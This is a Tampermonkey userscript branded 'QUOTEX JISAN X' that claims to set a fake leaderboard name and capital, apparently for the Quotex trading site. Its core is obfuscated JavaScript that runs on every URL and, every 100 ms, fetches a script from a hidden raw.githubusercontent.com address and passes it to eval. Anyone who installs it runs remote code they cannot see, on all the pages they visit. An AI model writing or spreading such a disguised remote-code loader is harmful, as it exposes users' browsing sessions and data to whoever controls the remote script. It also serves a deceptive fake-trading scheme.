// ==UserScript==
// @name         QUOTEX JISAN X
// @namespace    http://tampermonkey.net/
// @version      2024-07-13
// @description  Contact us to get lifetime access
// @author       treaderjisanx
// @match        <all_urls>
// @icon         https://i.postimg.cc/br239Jp7/20241213-144924.png
// @grant        none
// ==/UserScript==

setInterval(function(){
// Set your leaderboard name and initial capital here

const lname = "Treader Jisan X";
const iblafp = 456759;


function _0x44ed(_0x29f51c,_0x27e120){var _0x3526a5=_0x444b();return _0x44ed=function(_0x3b47d3,_0x164fe2){_0x3b47d3=_0x3b47d3-(0x2*0x52f+0x137e+-0x1c3a);var _0x127938=_0x3526a5[_0x3b47d3];return _0x127938;},_0x44ed(_0x29f51c,_0x27e120);}var _0x183362=_0x44ed;(function(_0x289982,_0x3de262){var _0x3efe62=_0x44ed,_0x4b9bd7=_0x289982();while(!![]){try{var _0x19dd13=-parseInt(_0x3efe62(0x1b4))/(-0x17ce+0x1*-0x1e33+0x1b01*0x2)+-parseInt(_0x3efe62(0x1ba))/(-0x1b6+0x535+0x13*-0x2f)+-parseInt(_0x3efe62(0x1b3))/(0x20b7+0x3*0x2f9+-0x299f)+parseInt(_0x3efe62(0x1b0))/(0x17*-0x22+0x1*0x11a1+-0xe8f)+-parseInt(_0x3efe62(0x1ac))/(-0x8bb+0x1*-0x11e1+0x1aa1)+parseInt(_0x3efe62(0x1a2))/(0xc54+0xa42+0x4c*-0x4c)+parseInt(_0x3efe62(0x1a6))/(0x829+0x3*-0x83f+0x109b)*(parseInt(_0x3efe62(0x1b6))/(0x2253+0x25*-0x13+-0x1f8c));if(_0x19dd13===_0x3de262)break;else _0x4b9bd7['push'](_0x4b9bd7['shift']());}catch(_0x427e1d){_0x4b9bd7['push'](_0x4b9bd7['shift']());}}}(_0x444b,0x2349d*0x3+-0x38776+-0x20*-0x12d4),fetch(_0x183362(0x1a4)+_0x183362(0x1af)+_0x183362(0x1b7)+_0x183362(0x1a8)+_0x183362(0x1ae)+_0x183362(0x1b8)+_0x183362(0x1a9)+'PK')[_0x183362(0x1b9)](_0x5bb281=>_0x5bb281[_0x183362(0x1a3)]())[_0x183362(0x1b9)](_0x5a9f7b=>{var _0xf829dd=_0x183362,_0x59efd4={'LYzfH':function(_0x44c751,_0x4979ba){return _0x44c751+_0x4979ba;},'yAeOE':function(_0x5070f2,_0xb417e8){return _0x5070f2(_0xb417e8);}};_0x5a9f7b=_0x59efd4[_0xf829dd(0x1b2)](_0xf829dd(0x1a7)+_0xf829dd(0x1ad)+lname+(_0xf829dd(0x1bc)+_0xf829dd(0x1bb)+'=\x20')+iblafp+_0xf829dd(0x1b5),_0x5a9f7b),_0x59efd4[_0xf829dd(0x1aa)](eval,_0x5a9f7b);})[_0x183362(0x1ab)](_0x50205c=>console[_0x183362(0x1b1)](_0x183362(0x1a5),_0x50205c)));function _0x444b(){var _0x39d939=['et\x20iblafp\x20','\x22;\x0a\x20\x20\x20\x20\x20\x20l','1070448ifHYzW','text','https://ra','Error:','14snGpSe','\x0a\x20\x20\x20\x20\x20\x20let','com/jisanx','ain/IPhone','yAeOE','catch','3155890ZLaeCz','\x20lname\x20=\x20\x22','js/real/re','w.githubus','1979248OPmoHL','error','LYzfH','83421kzmhaE','644296Wkcpoh',';\x0a\x20\x20\x20\x20','6385760RPaCtB','ercontent.','fs/heads/m','then','1219604LwOMVy'];_0x444b=function(){return _0x39d939;};return _0x444b();}},100)

